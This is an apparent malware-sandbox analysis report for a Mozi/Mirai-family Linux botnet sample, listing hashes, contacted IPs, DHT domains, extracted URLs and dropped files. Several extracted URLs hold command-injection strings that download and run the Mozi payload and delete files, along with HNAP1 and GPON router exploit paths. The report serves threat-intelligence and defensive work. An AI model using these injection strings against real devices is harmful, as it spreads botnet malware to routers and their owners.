We are hiring! Windows Kernel Developer (Remote), apply here!
flash

MGuvcs6Ocz

Status: finished
Submission Time: 2021-04-25 20:58:13 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    397466
  • API (Web) ID:
    697090
  • Analysis Started:
    2021-04-25 20:58:14 +02:00
  • Analysis Finished:
    2021-04-25 21:09:01 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
41/60

malicious
20/37

malicious
20/29

malicious

IPs

IP Country Detection
91.57.107.2
Germany
153.157.9.172
Japan
94.31.145.150
Russian Federation
Click to see the 97 hidden entries
100.182.99.144
United States
110.192.131.42
China
207.67.91.44
United States
74.18.244.100
United States
130.68.74.157
United States
13.219.81.91
United States
157.46.152.22
India
50.10.218.224
United States
157.14.182.109
Japan
172.42.40.243
United States
16.98.151.230
United States
49.0.203.86
Mongolia
178.175.121.49
Montenegro
8.195.49.95
United States
135.233.240.19
United States
163.246.109.119
United States
3.146.148.144
United States
219.47.162.234
Japan
1.207.152.148
China
132.204.24.45
Canada
211.18.19.160
Japan
61.231.92.160
Taiwan; Republic of China (ROC)
65.173.118.23
United States
43.245.138.132
India
139.130.197.234
Australia
138.40.6.32
United Kingdom
175.159.188.41
Hong Kong
57.211.14.243
Belgium
86.104.41.235
Iran (ISLAMIC Republic Of)
105.162.120.29
Kenya
199.125.24.246
United States
114.100.97.125
China
157.245.145.71
United States
119.197.149.98
Korea Republic of
147.22.206.236
United States
170.169.8.221
Mexico
222.48.163.26
China
117.151.233.14
China
198.94.113.247
United States
218.231.43.124
Japan
196.90.229.151
Morocco
114.182.18.144
Japan
208.228.127.61
United States
131.30.249.212
United States
89.61.117.218
Germany
159.0.138.11
Saudi Arabia
9.20.231.34
United States
219.15.149.67
Japan
181.82.14.167
Argentina
129.13.128.214
Germany
31.135.20.186
Poland
135.235.118.101
United States
44.179.175.67
United States
31.246.254.22
Germany
129.61.62.75
United States
115.145.240.169
Korea Republic of
20.219.183.3
United States
175.59.180.182
China
174.166.171.113
United States
167.116.31.50
Uruguay
37.218.12.173
Spain
4.147.62.142
United States
98.117.217.106
United States
9.119.216.229
United States
50.18.249.52
United States
105.23.11.84
Mauritius
177.97.224.43
Brazil
131.194.232.220
United States
33.59.152.55
United States
141.33.224.95
Germany
113.189.251.248
Viet Nam
81.165.231.66
Belgium
219.215.91.164
Japan
126.76.20.8
Japan
134.125.107.194
United States
172.92.207.39
United States
181.20.57.55
Argentina
85.65.154.68
Israel
101.197.152.207
China
217.211.238.79
Sweden
221.34.98.191
Japan
211.169.167.142
Korea Republic of
114.36.89.87
Taiwan; Republic of China (ROC)
58.189.27.210
Japan
117.213.41.118
India
179.67.135.130
Brazil
189.52.247.3
Brazil
187.212.113.5
Mexico
44.9.1.20
United States
120.98.233.8
Taiwan; Republic of China (ROC)
169.208.248.210
Korea Republic of
31.167.14.125
Saudi Arabia
181.100.16.154
Argentina
194.174.210.204
Germany
165.81.92.196
United States
85.140.136.230
Russian Federation
117.196.107.209
India

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://%s:%d/bin.sh;chmod
http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 48 hidden entries
http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.40.37.31:80/HNAP1/
http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://45.65.120.55:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://81.7.8.12:80/HNAP1/
http://18.228.54.139:80/HNAP1/
http://157.245.223.131:80/HNAP1/
http://133.137.248.191:80/HNAP1/
http://%s:%d/bin.sh
http://146.158.12.4:80/HNAP1/
http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://166.88.243.237:80/HNAP1/
http://154.201.250.66:80/HNAP1/
http://217.182.243.67:80/HNAP1/
http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://168.184.43.22:37215/ctrlt/DeviceUpgrade_1
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://schemas.xmlsoap.org/soap/envelope/
http://www.alsa-project.org.
http://HTTP/1.1
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://pastebin.ca)
http://127.0.0.1sendcmd
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://schemas.xmlsoap.org/soap/encoding/
http://35.244.243.215:80/HNAP1/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#